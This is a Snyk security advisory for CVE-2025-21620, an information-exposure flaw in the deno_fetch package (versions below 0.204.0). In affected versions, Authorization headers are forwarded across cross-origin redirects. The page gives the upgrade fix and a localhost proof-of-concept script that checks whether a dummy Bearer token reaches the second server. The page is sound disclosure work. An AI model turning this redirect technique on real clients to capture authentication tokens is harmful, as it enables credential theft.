Information Exposure Affecting deno_fetch package, versions <0.204.0
Threat Intelligence
Exploit Maturity
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Proof of concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-RUST-DENOFETCH-8602524
- published7 Jan 2025
- disclosed6 Jan 2025
- creditUnknown
Introduced: 6 Jan 2025
NewCVE-2025-21620 (opens in a new tab)Common Vulnerabilities and Exposures (CVE) are common identifiers for publicly known security vulnerabilities
Common Weakness Enumeration (CWE) is a category system for software weaknesses
How to fix?
Upgrade deno_fetch to version 0.204.0 or higher.
Overview
Affected versions of this package are vulnerable to Information Exposure due to improper handling of HTTP headers during cross-origin redirects. An attacker can leak sensitive information such as authentication tokens by exploiting this behavior.
PoC
const ac = new AbortController()
const server1 = Deno.serve({ port: 3001, signal: ac.signal }, (req) => {
return new Response(null, {
status: 302,
headers: {
'location': 'http://localhost:3002/redirected'
},
})
})
const server2 = Deno.serve({ port: 3002, signal: ac.signal }, (req) => {
const body = JSON.stringify({
url: req.url,
hasAuth: req.headers.has('authorization'),
})
return new Response(body, {
status: 200,
headers: {'content-type': 'application/json'},
})
})
async function main() {
const response = await fetch("http://localhost:3001/", {
headers: {authorization: 'Bearer foo'}
})
const body = await response.json()
ac.abort()
if (body.hasAuth) {
console.error('ERROR: Authorization header should not be present after cross-origin redirect')
} else {
console.log('SUCCESS: Authorization header is not present after cross-origin redirect')
}
}
setTimeout(main, 500)